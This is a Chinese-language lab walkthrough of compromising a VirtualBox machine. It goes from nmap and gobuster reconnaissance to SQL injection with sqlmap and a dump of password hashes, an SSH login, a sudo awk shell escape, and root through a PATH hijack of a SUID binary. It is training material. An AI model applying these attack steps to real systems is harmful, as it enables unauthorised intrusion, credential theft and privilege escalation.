信息搜集主机发现┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.2.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-10 00:30 EDT Nmap scan report for laboratoryuser (192.168.2.2) Host is up (0.00029s latency). MAC Address: 08:00:27:DD:5D:00 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap scan report for kali (192.168.2.15) Host is up. Nmap done: 256 IP addresses (7 hosts up) scanned in 2.16 seconds端口扫描┌──(kali㉿kali)-[~] └─$ nmap -A -p- 192.168.2.2 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-10 00:31 EDT Nmap scan report for laboratoryuser (192.168.2.2) Host is up (0.00034s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 63:9c:2e:57:91:af:1e:2e:25:ba:55:fd:ba:48:a8:60 (RSA) | 256 d0:05:24:1d:a8:99:0e:d6:d1:e5:c5:5b:40:6a:b9:f9 (ECDSA) |_ 256 d8:4a:b8:86:9d:66:6d:7f:a4:cb:d0:73:a1:f4:b5:19 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Nebula Lexus Labs MAC Address: 08:00:27:DD:5D:00 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 4.19 (97%), Linux 5.0 - 5.14 (97%), OpenWrt 21.02 (Linux 5.4) (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (97%), Linux 6.0 (94%), Linux 2.6.32 (91%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.34 ms laboratoryuser (192.168.2.2) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 120.49 seconds漏洞利用目录扫描┌──(kali㉿kali)-[~] └─$ gobuster dir -u http://192.168.2.2 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,jpg,png,zip,git,txt Gobuster v3.6 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.2.2 [] Method: GET [] Threads: 10 [] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.6 [] Extensions: txt,html,php,jpg,png,zip,git [] Timeout: 10s Starting gobuster in directory enumeration mode /.html (Status: 403) [Size: 276] /.php (Status: 403) [Size: 276] /index.php (Status: 200) [Size: 3479] /img (Status: 301) [Size: 308] [-- http://192.168.2.2/img/] /login (Status: 301) [Size: 310] [-- http://192.168.2.2/login/] /joinus (Status: 301) [Size: 311] [-- http://192.168.2.2/joinus/] /.html (Status: 403) [Size: 276] /.php (Status: 403) [Size: 276] /server-status (Status: 403) [Size: 276] /logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 276] Progress: 9482032 / 9482040 (100.00%) Finished 发现了/joinus目录扫描┌──(kali㉿kali)-[~] └─$ gobuster dir -u http://192.168.2.2/joinus -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,jpg,png,zip,git,txt Gobuster v3.6 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.2.2/joinus [] Method: GET [] Threads: 10 [] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.6 [] Extensions: png,zip,git,txt,html,php,jpg [] Timeout: 10s Starting gobuster in directory enumeration mode /index.php (Status: 200) [Size: 1712] /.php (Status: 403) [Size: 276] /.html (Status: 403) [Size: 276] /.html (Status: 403) [Size: 276] /.php (Status: 403) [Size: 276] /logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 276] Progress: 9482032 / 9482040 (100.00%) Finished 没扫出来还是打开看一看吧┌──(kali㉿kali)-[~] └─$ curl http://192.168.2.2/joinus/ a hrefapplication_form.pdf target_blankhere/a在application_form.pdf找到了https://nebulalabs.org/meetings?useradminpasswordd46df8e6a5627debf930f7b5c8f3b083在/login尝试登录发现这个页面可能存在sql注入用sqlmap尝试一下┌──(kali㉿kali)-[~] └─$ sqlmap -r sql.txt --dbs available databases [2]: [*] information_schema [*] nebuladb ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql.txt -D nebuladb --tables Database: nebuladb [3 tables] ---------- | central | | centrals | | users | ---------- ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql.txt -D nebuladb -T users --dump Database: nebuladb Table: users [7 entries] ------------------------------------------------------------------------- | id | is_admin | password | username | ------------------------------------------------------------------------- | 1 | 1 | d46df8e6a5627debf930f7b5c8f3b083 | admin | | 2 | 0 | c8c605999f3d8352d7bb792cf3fdb25b (999999999) | pmccentral | | 3 | 0 | 5f823f1ac7c9767c8d1efbf44158e0ea | Frederick | | 3 | 0 | 4c6dda8a9d149332541e577b53e2a3ea | Samuel | | 5 | 0 | 41ae0e6fbe90c08a63217fc964b12903 | Mary | | 6 | 0 | 5d8cdc88039d5fc021880f9af4f7c5c3 | hecolivares | | 7 | 1 | c8c605999f3d8352d7bb792cf3fdb25b (999999999) | pmccentral | -------------------------------------------------------------------------ssh登录┌──(kali㉿kali)-[~] └─$ ssh pmccentral192.168.2.2 pmccentral192.168.2.2s password: Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-169-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri 10 Apr 2026 06:22:43 AM UTC System load: 0.0 Processes: 124 Usage of /: 57.9% of 9.75GB Users logged in: 0 Memory usage: 46% IPv4 address for enp0s3: 192.168.2.2 Swap usage: 0% * Ubuntu 20.04 LTS Focal Fossa has reached its end of standard support on 31 May 2025. For more details see: https://ubuntu.com/20-04 * Introducing Expanded Security Maintenance for Applications. Receive updates to over 25,000 software packages with your Ubuntu Pro subscription. Free for personal use. https://ubuntu.com/pro Expanded Security Maintenance for Applications is not enabled. 2 updates can be applied immediately. To see these additional updates run: apt list --upgradable Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Mon Dec 18 20:05:04 2023 from 192.168.193.186 pmccentrallaboratoryuser:~$权限提升pmccentrallaboratoryuser:~$ whoami;id;hostname;uname -a pmccentral uid1001(pmccentral) gid1001(pmccentral) groups1001(pmccentral) laboratoryuser Linux laboratoryuser 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux //pmccentral可以以laboratoryadmin身份执行awk命令 pmccentrallaboratoryuser:~$ sudo -l Matching Defaults entries for pmccentral on laboratoryuser: env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User pmccentral may run the following commands on laboratoryuser: (laboratoryadmin) /usr/bin/awk //wk内置system()函数可执行系统命令。用 sudo -u laboratoryadmin以高权限用户身份运行awk在BEGIN块中调用 system(/bin/bash)即可生成一个laboratoryadmin的交互式 Shell。 pmccentrallaboratoryuser:~$ sudo -u laboratoryadmin awk BEGIN {system(/bin/bash)} laboratoryadminlaboratoryuser:/home/pmccentral$ id uid1002(laboratoryadmin) gid1002(laboratoryadmin) groups1002(laboratoryadmin) laboratoryadminlaboratoryuser:~$ sudo -l [sudo] password for laboratoryadmin: Sorry, try again. [sudo] password for laboratoryadmin: Sorry, try again. [sudo] password for laboratoryadmin: sudo: 3 incorrect password attempts //寻找所有设置了SUID位的可执行文件。SUID程序会以文件属主的权限运行若属于root则是潜在提权入口。 laboratoryadminlaboratoryuser:~$ find / -perm -4000 -type f 2/dev/null /usr/bin/newgrp /usr/bin/sudo /usr/bin/su /usr/bin/umount /usr/bin/at /usr/bin/chsh /usr/bin/pkexec /usr/bin/mount /usr/bin/fusermount /usr/bin/passwd /usr/bin/gpasswd /usr/bin/chfn /usr/lib/openssh/ssh-keysign /usr/lib/snapd/snap-confine /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /snap/core20/1828/usr/bin/chfn /snap/core20/1828/usr/bin/chsh /snap/core20/1828/usr/bin/gpasswd /snap/core20/1828/usr/bin/mount /snap/core20/1828/usr/bin/newgrp /snap/core20/1828/usr/bin/passwd /snap/core20/1828/usr/bin/su /snap/core20/1828/usr/bin/sudo /snap/core20/1828/usr/bin/umount /snap/core20/1828/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/1828/usr/lib/openssh/ssh-keysign /snap/snapd/18357/usr/lib/snapd/snap-confine /snap/snapd/20290/usr/lib/snapd/snap-confine /home/laboratoryadmin/autoScripts/PMCEmployees //属于root并有SUID位 laboratoryadminlaboratoryuser:~$ ls -la /home/laboratoryadmin/autoScripts/PMCEmployees -rwsr-xr-x 1 root root 16792 Dec 17 2023 /home/laboratoryadmin/autoScripts/PMCEmployees laboratoryadminlaboratoryuser:~$ /home/laboratoryadmin/autoScripts/PMCEmployees aren Aarika Abagael Abagail Abbe Abbey Abbi Abbie Abby Abbye Showing top 10 best employees of PMC company //system()调用时没有指定head的绝对路径它会在PATH环境变量中搜索名为head的程序 int __fastcall main(int argc, const char **argv, const char **envp) { setuid(0); printf(Showing top 10 best employees of PMC company); return system(head /home/pmccentral/documents/employees.txt); } laboratoryadminlaboratoryuser:~/autoScripts$ ls -la total 32 drwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 18 2023 . drwx------ 8 laboratoryadmin laboratoryadmin 4096 Dec 18 2023 .. -rwxrwxr-x 1 laboratoryadmin laboratoryadmin 8 Dec 18 2023 head -rwsr-xr-x 1 root root 16792 Dec 17 2023 PMCEmployees laboratoryadminlaboratoryuser:~/autoScripts$ cat head bash -p //在目录下创建一个恶意脚本命名为head laboratoryadminlaboratoryuser:~/autoScripts$ echo /usr/bin/bash -p head //修改PATH环境变量将当前目录置于首位 laboratoryadminlaboratoryuser:~/autoScripts$ export PATH/home/laboratoryadmin/autoScripts:$PATH //程序内部执行system(head ...)时会优先在/home/laboratoryadmin/autoScripts/head找到我们的恶意脚本并以root权限执行它 laboratoryadminlaboratoryuser:~/autoScripts$ ./PMCEmployees bash: groups: command not found Command lesspipe is available in the following places * /bin/lesspipe * /usr/bin/lesspipe The command could not be located because /bin:/usr/bin is not included in the PATH environment variable. lesspipe: command not found Command dircolors is available in the following places * /bin/dircolors * /usr/bin/dircolors The command could not be located because /usr/bin:/bin is not included in the PATH environment variable. dircolors: command not found rootlaboratoryuser:~# /bin/id uid0(root) gid1002(laboratoryadmin) groups1002(laboratoryadmin)